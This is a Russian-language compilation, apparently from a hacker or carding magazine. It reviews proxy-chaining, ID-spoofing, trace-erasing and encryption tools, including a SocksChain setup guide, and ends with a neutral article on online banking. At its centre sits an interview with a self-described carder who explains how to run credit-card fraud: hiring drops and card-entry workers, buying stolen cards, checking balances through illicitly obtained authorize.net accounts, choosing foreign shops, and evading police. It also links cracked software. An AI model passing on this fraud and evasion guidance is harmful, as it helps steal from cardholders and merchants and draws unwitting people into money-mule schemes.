Proxifier - программа, позволяющая сетевым програмам не имеющим возможность работать через прокси сервера обходить это ограничение. С Proxifier вы можете работать с любыми интернет клиентами (браузеры, ftp, ICQ, IRC, Kazaa, Telnet, ssh, видео и аудио, играми, и т.п.) из сети, которая отделена от Интернета файерволом (необходим только один открытый порт). Proxifier поможет обеспечить секретность вашей информации, посылать и получать e-mail через прокси сервер, или цепь прокси серверов. Все почтовые клиенты поддерживаются (Outlook, Eudora, Netscape и другие). Программа очень полезная и, главное, работает!
офф сайт Proxifier - Bypass firewall and proxy, tunnel connections through an HTTPS and SOCKS proxy http://proxifier.com/
FreeCap
Утилита, которая позволяет прозрачно перенаправлять запросы на соединение от программ, которые не имеют родной поддержки SOCKS-прокси. Поддерживаются SOCKS протоколы v4 и v5, возможна работа через цепочку SOCKS-серверов (SOCKS Chain), а также прямые соединения на определённые порты. Полная поддержка стандартов RFC 1928, 1929, 2817 (SOCKS v4 и v5, авторизация для SOCKS5 и HTTP CONNECT).
Офф сайт: FreeCap Homepage - http://www.freecap.ru/
WideCap 1.5
Системный поксификатор . Продолжение программы FreeCap.
Офф сайт: WideCap Home http://widecap.ru/
SocksCap_2.40
Позволяет практически любой программе работать через socks5 прокси.
Настройка программы SocksCap не составит никакого труда, т.к. в ней поддерживается метод drag&drop - для добавления приложений, которым нужно разрешить выход в Интернет, достаточно просто перетащить их иконки в окно SocksCap. Настолько же просто выполнено и управление запуском программ, выходящим в Интернет через socks5 прокси: для этого достаточно всего лишь нажать правой кнопкой мыши на иконке SocksCap, находящейся в системном лотке, и выбрать необходимую программу.
Более подробно: http://sockscap.ru
SocksChain
Программа, позволяющая работать через цепочку SOCKS или HTTP-проксей для того, чтобы скрыть истинный IP-адрес. SocksChain может работать как обычный SOCKS-сервер, транслируя запросы по цепочке проксей, также он может быть использован с клиентскими программами, которые не поддерживают протокол SOCKS, но работают с одним TCP-соединением, например TELNET, HTTP, IRC... (FTP использует 2 соединения). При этом ваш IP-адрес не будет появляться в логах сервера или заголовках почтовых сообщений.
Настройка SocksChain:
1. Добавляем прокси, есть два способа:
а) Файл -> Импорт -> Ваш список прокси (взять можно из паблика любых)
б) Инструменты -> Proxy manager -> Add -> Вставляете из буфера -> OK
2. Прокси загрузили, нужно их прочекать:
Инструменты -> Proxy manager -> Test all
Если рядом с вашим прокси рисунок лампочки - значит ок, прокси рабочий, если кружок с крестиком - значит прокси мертв (ну тут все понятно, нужно искать еще).
3. Настраиваем нашу цепочку:
Service -> Modify (появляется окно, пройдемся по пунктам)
Имя: Chain
Входящий порт: 1080
Auto-creating chain: ставим галочку
Change the chain every: пишем число побольше, например, 99999999
Chain Length: тут можно указать количество прокси в вашей цепочке, чем больше прокси в вашей цепи - тем безопаснее, но и скорость заметно уменьшается, рекомендую от 1 до 3
Ниже находится маленкое окно, тут будет отображаться ваша цепочка из прокси, число в графе "Chain Length" должно соответствовать числу проксей в этом маленьком окне, т.е. если вы поставили в Chain Length "2", то и проксей в окне должно быть тоже два.
Справа список всех ваших соксов/прокси, чтобы добавить прокси в цепочку (в то маленькое окошко), кликаем на прокси (т.е. выделяем его) и нажимаем кнопку Add, если вам нужно, чтоб в цепочке было, например, 2 прокси повторяем действие. Ниже есть еще одно маленькое окошко, нам оно не интересно, оно должно быть пустым (если там есть сокс, удалите его кнопкой Delete). Нажимаем OK.
4. Инструменты -> Options -> Общие
Количество потоков: 30 (выбираете сами)
Time-out: 99999 s (выбираете сами)
Sessions time out after 99999 seconds of inactivity: (выбираете сами)
Enable connections only from localhost (127.0.0.1) (отмечаем)
Save Log to file SocksChain.log (можно отметить, можно не отмечать)
Fast disconnect (убираем галочку)
Инструменты -> Options -> Общие -> Proxy отмечаем Directly и Resolve domain names locally
Инструменты -> Options -> Upgrade отмечаем Enable Interaction with site. Нажимаем OK.
Все, SocksChain настроили.
Проверка HTTPS/SOCKS proxy серверов
Socks_checker 1.3.1
Программа предназначена для проверки HTTPS/SOCKS proxy серверов. Программа позволяет проверять HTTPS (CONNECT), SOCKS4, SOCKS5 proxy серверы; брать списки proxy как из текстовых, так и из HTML файлов самого различного формата; проверять списки proxy любого размера; проверять прокси на подключение к IRC сетям или к почтовым серверам.
Ultra Socks Checker 1.0
Программа предназначена для проверки HTTPS/SOCKS proxy серверов. Программа позволяет проверять HTTPS (CONNECT), SOCKS4, SOCKS5 proxy серверы; брать списки proxy как из текстовых, так и из HTML файлов самого различного формата; проверять списки proxy любого размера; проверять прокси на подключение к IRC сетям или к почтовым серверам.
Смена ID
ID-Blaster Plus
Утилита для оперативной смены Windows Product ID, UserID, Internet Explorer ID и идентификационного номера Windows Media Player. Учитывая, что эти данные потенциально небезопасны, так как являются уникальными для каждого компьтера и поэтому могут быть использованы для отслеживания действий пользователя, возможность сменить их может повысить уровень приватности.
Работает ID-Blaster Plus из системного лотка - клик, и открывается список с заранее введенными "поддельными" данными.
CCtools
v. 1.2 eng
v. 1.5 rus
Смена ID OС , смена ID IE , смена ID WMP , смена Hostname , смена имени на которое зарегистрирована ОС , смена названия компании на которое зарегистрирована ОС , смена названия процессора , смена билда системы , сохранение всех текущих ID в файл с возможностью их загрузки в программу , функции для генерации всех ID (в ручную писать не чего не придется). Сайт разработчика : http://xfq.jino-net.ru/features.html
RMOSChange 2
Программа изменяет HTTP заголовки Internet Explorer, Firefox, Mozilla, так, что сервер, не сможет узнать какая у вас установлена ОС, версия браузера и язык системы. Кстати, proxy скрывает только IP-адрес, но не больше. Вы можете выбрать себе Linux, SunOS, MacPC, Win 2003.
STZ Blaster
Для смены ID компа, часового пояса и т.п
Чистка системы
CCleaner
Данная утилита предназначена для чистки системного мусора. В ходе своей работы CCleaner (Crap Cleaner) ищет и удаляет временные и неиспользуемые файлы. Сюда относятся: cookies, история посещения сайтов в IE, временные файлы Интернета, строки поиска, файлы Корзины и т.д. Также поддерживается поиск временных файлов сторонних приложений: Firefox, Opera, Media Player, eMule, Kazaa, Google Toolbar, Netscape, Office XP, Nero, Alcohol 120, Adobe Acrobat, WinRAR, WinAce, WinZip, GetRight, Morpheus, Download Accelerator Plus, VirtualDub, ZoneAlarm и многих других.
Evidence Eliminator 6.01 - защитный инструмент, позволяющий быстро и качественно удалить информацию, которую видеть посторонним ни к чему. Это может быть и информацией о сайтах, которые вы посетили, с какими документами работали, какие файлы были на компьютере и т.д.
Eraser
Инструмент для безопасного стирания файлов, который позволяет полностью удалять данные с жесткого диска, записывая поверх них несколько раз сложные образцы, чтобы невозможно было восстановить стертые данные. Вы можете просто перетащить файлы и/или папки на соответствующую иконку, использовать меню Windows, щелкая правой кнопкой мыши, или использовать встроенный планировщик для автоматизированного стирания неиспользуемого дискового пространства, файлов кэша и т.д.
Сайт разработчика Eraser | Eraser http://eraser.heidi.ie/
Шифруем инфу
TrueCrypt 6.3
Позволяет создавать виртуальные зашифрованные диски, которые затем могут использоваться как обычные логические диски системы. Допустимые алгоритмы шифрования: AES (256-bit key), Blowfish (448-bit key), CAST5 (128-bit key), Serpent (256-bit key), Triple DES, Twofish (256-bit key). В качестве зашифрованного хранилища ("диска") можно использовать как часть свободного места на диске, так и целиком один из имеющихся разделов жесткого диска, а также flash-карты, дискеты и другие сьемные устройства хранения данных.
Еще одна из особенностей программы - отсутствие в заголовке созданного "диска" специфической сигнатуры, характерной для других подобных программ, что делает невозможным идентифицировать TrueCrypt-диск, т.к. ни одна из частей виртуального диска не отличается от случайных данных. На домашней странице доступны исходники.
В архиве последняя версия программы и файл русификации .
Руководство начинающего: Документация по TrueCrypt на русском <-- Переводы <-- http://tech.pp.ru/trans/
Сайт разрабочика: TrueCrypt - Free Open-Source On-The-Fly Disk Encryption Software for Windows 7/Vista/XP, Mac OS X and Linux
http://www.truecrypt.org/
Secustar DriveCrypt Standard
Securstar GmbH выпустила новую финальную версию программы DriveCrypt 4.10 для шифрования как данных так и партиций HDD дисков.
На данное время это одна из самых надёжных и эффективных программ шифрования данных.
SecurStar DriveCrypt 4.1 - это эффективное средство надёжной защиты конфиденциальной информации с помощью надежных алгоритмов шифрования (1344Bit Military Strength Hard Disk Encryption) а так же DriveCrypt представляет пользователю функции стеганографии т.е умеет скрывать наличие у пользователя контейнер с секретными файлами в аудио файлах.
BestCrypt Volume Encryption
обеспечивает прозрачное шифрование всех данных, хранящихся на жёстких и съёмных устройствах, автоматически, как только данные затрагиваются Windows или любыми другими программами. В случае шифрования системного или загрузочного раздела, то BestCrypt Volume не позволит загрузиться системе без ввода необходимого пароля. Программой используются режим шифрования для дисков LRW и современные и подтвержденные криптостойкостью продвинутые или скоростные алгоритмы шифрования с максимальным ключом: AES (Rijndael) -256; Blowfish - 448; CAST - 128; GOST 28147-89 - 256; RC6 - 256; Serpent - 256 и Twofish 256-бит. Кроме ввода пароля, как самого уязвимого места программа предлагает использование аппаратных USB-ключей как высоко секретное хранилище ключей шифрования. С аппаратными USB-ключами пользователь получает два уровня защиты зашифрованных данных, так как вместе с вводом пароля необходимо подсоединить к компьютеру небольшое по размеру аппаратное USB-устройство, где хранится ключ шифрования. К тому же вся система автоматически шифруется при переходе ее в "спящий режим" и BestCrypt Volume Encryption поддерживает несколько функций спасения, позволяющие пользователю расшифровать тома, если случается серьезная поломка диска.
Софт для кардера
Когда СМИ сообщают о поимке очередного кардера, первая мысль - скорее всего, взломщик халатно отнесся к собственной безопасности. Если не хочешь оказаться на его месте, позаботься о своем анонимном существовании.
Прокси-сервер
Все типы proxy-серверов обычно делят на три категории: шлюзы, кешируюшие и анонимные proxy-серверы.
Шлюзы чаще всего используются администраторами локальных сетей. Не давать же каждому пользователю "персональный" выход в глобальную сеть, вот и устанавливают прокси-сервер, чтобы удовлетворить за раз множество пользователей. Но отсюда и своя особенность – ни один внешний узел сети не может установить соединение с клиентом, так как proxy-сервер не понимает, кому из пользователей предназначен этот запрос. И поэтому при работе со шлюзом возможен только один тип соединения - от клиента к серверу.
Админы таким образом ограничивают пользователей - множество программ (к примеру, ICQ) не будут работать, так как требуют двухсторонней установки соединения. Зато огромный плюс - повышенная безопасность.
Второй тип proxy-серверов - кешируюший. Его использование (добровольное) значительно ускоряет загрузку страниц, особенно при соединении с сильно перегруженными серверами либо на плохой линии. Идея ясна - сервер сохраняет любые получаемые данные на своем диске (в кеше), и если запрошенный клиентом ресурс уже находится в кеше, он "отдается" уже без обращения к удаленному серверу. Схема не подходит для часто обновляющихся ресурсов, но "умные" кешируюшие прокси-серверы умеют с течением времени заново обращаться к удаленным серверам, проверять ресурс на наличие изменений и, соответственно, обновлять свой кеш.
Последний тип прокси-серверов - анонимные. Они отправляют запрос на получение данных от своего имени, не разглашая при этом IP пользователя. Они-то тебе и нужны.
Зачем это нужно
Анонимные прокси позволяют скрыть свой подлинный IP-адрес при манипуляциях в инете и при повседневном просмотре веб-страниц, закачке софта и т.п. К тому же большинство программ (IE, Opera, ICQ, Reget) умеют работать с прокси-серверами. Польза от использования этой связки несомненна - никто и никогда не узнает твой истинный IP-адрес, что поможет избежать кары небесной, а также отрезать всевозможные атаки извне на твой компьютер.
Ищем прокси-серверы
Ищут прокси-серверы двумя методами: в поисковиках или через специальный софт. Самый простой и распространенный поиск - по-дедовски, в популярных поисковых системах, типа www.rambler.ru, www.google.com, www.yahoo.com и т.д. Заходишь на любой из них и вводишь "прокси" + "лист". Результат перед глазами: куча ссылок, разгребать которые можно всю жизнь (при наличии свободного времени), причем велика вероятность получения битых ссылок.
Плюсы: доступность и легкость использования.
Минусы: большая часть полученных результатов - прокси-серверы, не пригодные для использования. Ввиду популярности метода большинство прокси - "дохлые", их скорость оставляет желать лучшего.
Другой метод заключается в использовании софта, который специально заточен под поиск прокси в инете. Одна из подобных программ - Proxy Hunter. Все что от тебя требуется, это ввести диапазон IP-адресов для проверки, остальное программа сделает сама. Интуитивно понятный интерфейс, простота в использовании, легкость в настройке и еще множество полезных функций - все это о Proxy Hunter.
Плюсы: легкость в использовании, возможность получения наглядных результатов. Минусы: на dialup’е придется изрядно подождать.
Проверка прокси на анонимность
Собственно, самое главное - не найти анонимный прокси, а убедиться, что он действительно анонимен. Иначе доказывай потом в отдаленных местах, что ты не жираф (УК РФ читал?).
И снова варианты. Первый - опять же через веб-ресурсы, а второй - софтина Proxy Checker. Скачиваешь, устанавливаешь, и ProxyChecker готов к работе. Для простоты работы программе можно отдать на съедение запрос "IPort", после чего можно откинутся на спинку кресла и, попивая горячий чаек, ожидать результатов работы. Программа умная и может параллельно обрабатывать несколько запросов и дожидаться коннекта при очередном разрыве связи (диалапщики меня поймут). Удобно, что при проверке прокси на анонимность рядом с проверенными кандидатами указывается их скорость работы. В общем, золото, а не программа. Для комфортной работы требуется зарегистрировать программу, иначе она прекратит действовать по истечении 7 дней либо после 50 запусков.
Насаживаем браузер на прокси
Настройка любого браузера для работы с прокси во многом одна и та же, поэтому покажу на примере популярного браузера от компании Microsoft под скромным названием Internet Explorer.
В меню "Сервис" выбери пункт "Свойство обозревателя".
В открывшемся диалоговом окне перейди к закладке "Подключение".
Нажми кнопку "Настройка локальной сети", затем отметь CheckBox "Использовать прокси-сервер" и в строке "Адрес" введи IP-адрес прокси, а в строке "Порт" - соответственно порт (обычно 80 или 8080).
Вот и все, непосильный процесс настройки закончен.
Софт
Софта существует более чем достаточно, остановимся на двух проверенных экземплярах: SurfNow Professional и Anonymity 4 Proxy.
SurfNow Professional (9x/Me/NT/2k/XP)
www.loomsoft.com
shareware
(интерфейс английский, весит ~940 Кб)
При первом запуске программа просто очаровывает юзера - верх эстетики. Главная фишка шароварки - система поиска новых прокси. Теперь тебе не нужно мучительно ходить на security-сайты, чтобы увести из-под носа товарища еще не "юзанную" прокси. SurfNow все сделает за тебя (жалко, штаны не гладит и обед не готовит - прим. ред.). Программа доставляет удовольствие тремя способами: искать прокси с помощью google, вытащить список из заданного файла или, наконец, "пропарсить" определенный url на предмет IP-адресов.
Чтобы удостовериться, что прокси не "умерли", софтина сразу проверяет их на анонимность, что, согласись, очень удобно. Также разработчики не позабыли и столь нужные фичи, как смена прокси "на лету", возможность добавления в список проверенных бойцов и т.д. У программы есть ОДИН недостаток - это платность, обратись в асталависту.
Anonymity 4 Proxy (9x/Me/NT/2k/XP)
www.inetprivacy.com/a4proxy
shareware
(интерфейс английский, весит ~1077 Кб)
Этот "комбайн" появился давно, но постоянно обновляется, с каждой версией становясь все привлекательнее. Возможности аналогичны SurfNow, так что выбирай сам.
Мучительный конец
Читай на ночь УК РФ и всегда заботься о своей безопасности (не только в инете).
Ресурсы со списками прокси
www.proxychecker.ru
www.samair.ru/proxy
www.all-nettools.com/tools1.htm
www.leader.ru/secure
www.checker.freeproxy.ru/checker
www.shadowsecurity.net.ua/r/checking2.shtml
www.antichat.ru/proxy
www.pascal.sources.ru/cgi-bin/forum/YaBB.cgi?board=security
www.uinc.ru/forum/index.shtml
www.bugtraq.ru/forum
www.securitylab.ru
Проверка прокси на анонимность
Где можно купить прокси
Форумы по безопасности
Анонимайзеры
Есть в инете специальные службы – анонимайзеры. По сути, это веб-интерфейсы анонимных прокси-серверов. Заходишь на сервер анонимайзера, вводишь нужный адрес, и через некоторое время загружается нужный ресурс. При этом можешь быть уверен в своей приватности.
Анонимайзер как бы выступает посредником между тобой и просматриваемым сайтом, с которым ты соединяешься. В результате ты абсолютно анонимен - не известно ни твое местоположение, ни твой провайдер, ни твой истинный IP-адрес, одним словом, красота. Кроме этого, некоторые анонимайзеры умеют блокировать вредоносные скрипты и программы.
Все здорово, но главный недостаток анонимайзера - он существенно замедляет скорость загрузки страниц. Второй недостаток этих иногда полезных сервисов – за них надо платить. Бесплатны только "молодые" анонимайзеры, которые только раскручивают свои услуги. Некоторые анонимайзеры все-таки дают бесплатный доступ, но при этом все запросы идут с временной задержкой. У www.anonimizer.com она, к примеру, порядка 30 секунд. Еще один подобный вариант - www.safeweb.com. В принципе, их достаточно в инете, зайди на любой поисковик и введи "анонимайзер" и "anonimizer".
Отдельно могу обрадовать умельцев - в инете можно найти исходники анонимайзеров и замутить свой собственный, возможно, только для себя любимого. К примеру, исходники когда-то популярного анонимайзера Freedom Network теперь раздаются совершенно бесплатно - www.theregister.co.uk/content/55/24094.html.
Все типы proxy-серверов обычно делят на три категории: шлюзы, кешируюшие и анонимные proxy-сервера.
Анонимные прокси позволяют скрыть свой подлинный IP-адрес при манипуляциях в инете и при повседневном просмотре веб-страниц, закачке софта и т.п.
Ищут прокси-серверы двум методами: в поисковиках или через специальный софт. Самый простой и распространенный поиск - по-дедовски, в популярных поисковых системах, типа www.rambler.ru, www.google.com, www.yahoo.com и т.д.
Программа доставляет удовольствие тремя способами: искать прокси с помощью google, вытащить список из заданного файла или, наконец, "пропарсить" определенный url на предмет IP-адресов.
Тайна бизнеса кардера
В любом бизнесе много сложностей и нюансов. Кардерский не исключение. Одной твоей целеустремленности мало для реализации столь прибыльного дела, как вещевой кардинг. Как показывает практика, для того чтобы выйти сухим из воды, сперва надо набраться опыта и лишь потом претворять свои планы в жизнь.
Я решил взять интервью у известного в узких кругах JensMiller’а. Этот человек реально знает, как построить свое дело и что для этого требуется.
JensMiller, традиционный первый вопрос: в чем суть вещевого кардинга, и почему он приобрел такую популярность?
Дело в том, что вещевой кардинг – одно из самых интересных, и в то же время доступных течений. Если человек знает, что делает, и имеет в подчинении хороших работников, его бизнес пойдет как по маслу. Главное найти подходящую жертву и следить за безопасностью.
Это в теории. А как добиться этого на практике? Что за работники будут принимать участие в бизнесе кардера?
Вообще, для того чтобы более-менее централизировать свое дело, кардеру необходимо найти опытных дропов, вбивальщиков и качественный картон. И только после этого можно выполнять какие-либо кардерские действия.
Дропы? Что-то я даже не слышал о такой профессии. Что это за люди, и где их следует искать?
Дропы – это попросту те, кто подставляет свою задницу и обналичивает чеки. Кроме того, дроп занимается принятием и сбытом товара. В идеале, такой человек должен приносить кардеру реальные бабки, ну и, соответственно, получать некоторый процент от них. Что касается поиска, этот народ ищется в основном на форумах по работе либо рекомендуются знакомыми кардерами.
Чем занимаются вбивальщики?
Вбивальщики занимаются только вбивом информации о карте в интернет-магазинах либо аукционах. Они играют огромную роль в жизни кардера, особенно когда ему лень вбивать данные самому. Это, как правило, начинающие кардеры, которые получают за свою работу довольно неплохие деньги, а также набираются опыта. Опыт же в кардинге – вещь незаменимая.
Хотелось бы знать реальную зарплату таких подчиненных.
Если вбивальщик получает некоторую сумму за каждый успешный вбив (а он подразумевает успешную сделку), ему выдается от 2 до 5$ (так плачу я). С дропом рассчитываются процентом от сделки. Когда это проверенный рекомендованный чел, ему отваливают 40-50%. Если же чувак был найден на форуме, то, пожалуй, он сам не подозревает, что является дропом. В этом случае зарплата копеечная – 5-10% от сделки. Хотя это тоже зависит от проводимой махинации.
С этим все ясно. Вернемся к третьему условию – качественному картону. Где взять валидные кредитки, и сколько они стоят?
Лучше картон добывать самому. Искать людей, которые выносят его с хостингов и инет-магазинов. Но это редко кому удается. В основном, карты продаются на буржуйских сетях типа DalNet и Efnet (большинство крупных каналов, кстати, были недавно прикрыты). Их распространяют проверенные люди, которые за счет этого живут. Картон считается качественным, если из 100 кредиток валидны не менее 95. Когда это условие нарушается, продавец обязан заменить товар.
Ты затронул очень важный вопрос – валидность карты. Как проверить положительный баланс? Существуют ли для этого свои методы?
Да, конечно. И методов довольно много. Начиная от банальной проверки с помощью порносайтов (безбожно устарело) и заканчивая X-login’ами. Это, попросту, аккаунт на сайте www.authorize.net. Поиметь туда доступ непросто – обычно аккаунты продаются в различных местах, либо подбираются наудачу. Суть этого метода заключается в том, что сервер подает запрос банку, который отвечает, имеется ли сумма на карте. Хотя я считаю, что после всяких валидейшенов картон уже не является девственным, потому как все чекалки берут себе некоторый процент от запрошенной суммы. За услуги. Поэтому если чел, который распространяет картон, хорошо зарекомендовал себя – его товар не проверяется на валидность.
В каких местах кардер меняет карты на товар? Можешь привести примеры ресурсов?
Не могу. Это закрытая информация и доступна она лишь проверенным людям. Скажу лишь одно – не стоит кардить российские магазины, это бессмысленно.
Почему? Обязательно поймают?
Если соблюдал анонимность – не поймают, но товар тебе не вышлют, это проверенный факт. Да и зачем ломать свои, когда существуют буржуйские ресурсы. Иностранцы народ наивный и охотно расстаются с деньгами.
Раз уж мы заговорили о безопасности, тогда такой вопрос. Почему кадеров ловят – из-за плохих вбивальщиков и дропов или по собственной глупости?
Философский вопрос. Причины могут быть разными, но ловят в основном на мелочах (например, из-за захода с реального ip-адреса). Бывают и случаи, когда облажался дроп, тем самым подставив задницу кардера. Радует лишь то, что у нас в России кардинг приравнивается к обычному мошенничеству. Порой наши доблестные правоохранительные органы вообще с трудом представляют, как можно купить товар в интернете, да еще и расплатившись кредиткой. Но в любом случае, милиция пытается доказать, что кардер действительно осуществлял противозаконные махинации.
Если доказывают – судят?
Да, но, как я уже сказал, кардинг – всего лишь мошенничество. За это дают условный срок с конфискацией компа. За подробностями можешь заглянуть в уголовный кодекс – найдешь там много интересного. Кстати, судимостей за вещевой кардинг не так уж и много. В основном ловят за реал кардинг (подделка пластиковых карт). Здесь все довольно серьезно, вот, недавно взяли парней с поличным...
Что скажешь насчет безопасности? Можешь привести список полезных программ, которые помогают кардеру находиться в тени?
Да, могу. Но следует оговориться, что безопасность – это не проблема кардера, а задача вбивальщика. Он пользуется стандартным набором утилит, которые помогают ему в этом деле. Вот тебе заветный список – среди программ есть и тулзы, которые юзает сам кардер.
SocksChain - создает цепочку прокси или Socks-серверов для анонимности (www.ufasoft.com/files/sockschain_setup.exe).
A4proxy - незаменимая прога при работе с HTTP проксями. Находит валидные и анонимные из огромного списка (http://antichat.ru/soft/mwg-A4Proxy252.FullRetail.zip).
PGP - Софтина для шифрования данных на диске. Как альтернативу могу предложить BestCrypt (www.jetico.com/bcrypt6.exe).
Одного софта мало. Можешь сказать, где берут анонимные Socks и Proxy-сервера? Или это тоже закрытая информация?
Покупают. Для этого существуют свои тематические ресурсы. Например, www.proxyboss.net. Вообще достать подобные вещи не проблема – нужно лишь иметь аккаунт на сайте, либо знать стоящих людей, которые всегда подкинут тебе мегабайтовый листик прокси-серверов.
А теперь настало время для “интимного” вопроса. Какой заработок имеет кардер за месяц хорошей работы?
Как повезет. Все зависит от сделок, которые были успешно реализованы за промежуток времени. В основном совершается от десятка до сотни прибыльных сделок. При этом, если говорить о средней прибыли, кардер может получать от $1000 до $20000.
Неплохо! Признаться, даже мне захотелось заняться таким прибыльным делом.
Не все так просто. За такие деньги и проблем себе можешь нажить. В Сети существовали и будут существовать крысы, которые так и норовят кинуть честного кардера на бабки. Я говорю в основном о дропах, они не всегда честный народ. Хотя может кинуть кто угодно – продавец картона, проксиков и даже вбивальщик. Я уже ничему не удивлюсь.
А как определить, что тебя собираются кинуть? Или наверняка сказать невозможно?
Конечно, никак. Как и в реальной жизни, человек не знает, кто его может кинуть. Это человеческий фактор. Как правило, кидалы заносятся в черный список, который просматривается всеми кардерами. В нем можно найти ник, аську и координаты дропа (хотя, что мешает чуваку сменить ник?). Для этого, перед приемом на работу, у чувака просят скан паспорта. Эту процедуру проводят также для устрашения – человек дважды подумает насчет кидалова, если его попросят отсканировать документ.
Забавно, но кардеры сами иногда кидают дропов. Обещают им золотые горы, а затем забивают на них по полной. При этом наивный буржуин даже не способен ответить на кидалово.
Буржуин? Разве дропы не из России?
Нет. Как раз наоборот. Дропы, как правило, живут в USA и других странах. Наши ушлые представители могут кинуть кардера, как два байта переслать. Поэтому, если хочешь, чтобы твой бизнес процветал – учи иностранный язык, он тебе весьма пригодится.
Как гласит народная мудрость - главное вовремя остановиться. Актуально ли это для кардера?
Несомненно! Ловят именно из-за того, что кардер перегибает палку. Сначала он не может нарадоваться $1000, а потом ему становится мало $50 000. В итоге, после очередной крупной сделки – плачевный итог. Поэтому не стоит жадничать, и тогда все будет ок.
Какие ресурсы ты бы посоветовал для изучения кардерского мастерства? Есть ли такие вообще?
На этом сайте есть все, что касается кардинга, не побоюсь этого слова. Там можно найти замечательные статьи, форум, где ежедневно обсуждаются проблемы кардинга, а также листы доверенных кардеров и кидал. Эта информация весьма полезна. Что примечательно, по кардингу пишут только в России и ближних странах СНГ. Это связано с тем, что за границей немного другие законы, поэтому кардерство там не прижилось.
На этой оптимистической ноте и завершим наше интервью. И последний вопрос - что бы ты хотел пожелать читателем журнала? Выбрать легкий, на первый взгляд, способ заработать на жизнь или не рисковать?
Этот путь далеко не легкий. Если кто привык воровать, то такая работа ему будет по душе. А когда жизнь только начинается, мой тебе совет - не лезь в это грязное дело, а заработай в другом месте. На худой конец, будь просто вбивальщиком, не больше.
Спасибо за замечательные ответы. Я думаю, теперь читатель поймет, что кардерство – действительно опасный бизнес, хотя и довольно прибыльный. От себя замечу, что я полностью согласен с автором – если тебе чуждо воровство, не стоит заниматься этим делом. Наживешь меньше проблем на свою пятую точку.
Теперь ты понимаешь всю сложность бизнеса кардера. Начать и поддерживать свое дело очень сложно. Постоянно приходится сотрудничать с разными людьми и сталкиваться с кидалами. Но, несмотря на это, кардинг процветает и будет популярен до тех пор, пока не введут новые законы, которые будут жестоко пресекать подобную деятельность.
Автор выражает благодарность JensMiller ([email protected]) за интервью. Этот человек познал непростые азы кардинга, а начинал как большинство кардеров – с работы вбивальщиком.
Управляем банковским аккаунтом в онлайне
Компьютерные системы очень плотно вошли в нашу жизнь, так, что мы даже не задумываемся о них. Так же плавно в мир вошли электронные системы платежей, интернет-магазины, кредитные карты и многое-многое другое. Например, электронные банки. Несмотря на то, что это очень прогрессивное изобретение, которое день ото дня становится все популярнее (на западе), немногие знают о нем хоть что-то. Давай попробуем это исправить.
Что такое on-line banking
Онлайн-банкинг, он же электронный (e-banking) и домашний (home banking), это удаленное управление банковскими счетами посредством телефона (телебанкинг), персонального компьютера и интернета (интернет-банкинг) или портативных устройств (мобильный банкинг). Телебанкинг и мобильный банкинг мы пока отложим в сторону. А я расскажу тебе о типах on-line банков.
Существуют так называемые виртуальные банки - работающие с клиентами исключительно через интернет, и, в отличие от традиционных банков, не располагающие филиальной сетью. И есть традиционные банки, которые используют возможности интернета для удаленного банковского обслуживания своих клиентов. То есть помимо обычных своих сервисов, банк использует в качестве дополнительной услуги интернет-управление аккаунтами вкладчиков. Такой банк называется интернет-банком.
Ты спросишь, в чем же преимущество интернет-банков? В том, что где бы ты ни находился и что бы ни делал, имея под рукой компьютер с доступом в интернет, ты легко можешь управлять своими капиталами. Около 35 процентов европейцев, пользующихся интернетом, так и делают. В России дела обстоят немного по-другому: так как число пользователей интернета составляет всего 17 процентов от общего населения страны, то такой услугой, как онлайн-банкинг, пользуется лишь один из двухсот сорока семи юзеров. При этом он является юридическим лицом и разбирается в программном обеспечении на уровне «выше среднего». В России уже есть 10 крупных банков, предоставляющих своим клиентам такую услугу. Согласно информации, полученной с сайта Интер Финанс, в скором будущем откроются еще два, а значит - спрос на эти услуги все-таки есть.
И еще немного об удобствах и возможностях on-line banking’а. Список стандартных операций с аккаунтом через интернет, предлагаемых банками пользователям, почти везде одинаков. Это, естественно, просмотр текущего баланса и состояния счета, перевод и пополнение денежных средств. Пополнить счет можно как наличными, так и через банкомат, воспользовавшись пластиковой картой. Можно и закрыть счет. Вот только зачем? Существуют и бонусные возможности - например, заполнив специальный договор, можно получить в банке кредит. И это еще далеко не все.
Очевидно, что при пользовании on-line banking’ом тебе не придется бегать в банк и стоять в очереди, чтобы получить деньги или пополнить счет. Все гениальное просто. Так что, не отрывая пятой точки от кресла, можно произвести практически все те же операции, что и при посещении банка. Поэтому всякие умные люди, вроде Бори Березовского, используют систему интернет-банкинга. Прикинь, как пришлось бы заморачиваться бедняге, посещая несколько банков в разных частях мира, при том, что в некоторые страны его не пускают, а в некоторых еще и арестовать могут.
Кстати, некоторые банки предоставляют эту услугу абсолютно бесплатно, достаточно написать заявление.
Теперь еще о бонусах. У каждого банка есть как свои заморочки, так и свои достоинства. Так как я не смог объездить и обзвонить все банки, предоставляющие услуги онлайн-доступа (я рассматриваю только русские онлайн-банки), я позволил себе воспользоваться информацией из интернета.
Оказалось, что в некоторых банках имеет место реферальная система (как, например, в старой доброй спедии). Если ты привел, допустим, в Гута-Банк одного реферала, то получаешь 2 месяца бесплатного обслуживания. А если ты еще и старый клиент, то твой друг тоже получит 3 месяца фо фри. Также Гута-Банк позволяет тебе БЕСПЛАТНО открыть карточку Visa Electron.
В некоторых банках возможно установить лимит денежного перевода. Заметь, что переводы через интернет-банкинг считаются безналичными, и, соответственно, налогом с продаж не облагаются, что является реальным шансом сэкономить свои кровные.
Уверен, тебе уже захотелось открыть свой аккаунт в каком-нибудь онлайн-банке. Читай дальше, потому что именно об этом я и собираюсь рассказать. Особое внимание мы уделим безопасности, поскольку работать тебе придется с реальными деньгами.
К сожалению, полностью обезопаситься невозможно. Все, что сделано одним человеком, другой человек в силах сломать. Правда, в российских банках защита почти всегда на высшем уровне. И пользователю практически не придется заботиться о безопасности своей системы. В некоторых банках существуют как программные, так и аппаратные уровни защиты. Из аппаратных существуют USB-ключи и адаптерные ключи, по внешнему виду и устройству похожие на обычные ключи от домофонов. Но это не всегда хорошо. Как поступить, если на компьютере нет USB-порта? А если ты уезжаешь в отпуск, придется брать адаптер и ключ с собой. Ведь интернет-банкинг и создан для того, чтобы им управлять удаленно. Ключ можно потерять, а за новый придется платить даже больше, чем за первый, так как надо будет еще оплатить деактивацию старого ключа. Ключи, правда, стоят относительно недорого - в пределах 800 рублей. Если ты спросишь, какой из них выбрать, я бы посоветовал именно USB-ключ. Он более надежен. Такой ключ шифрует данные, передаваемые тобой во время работы с банком.
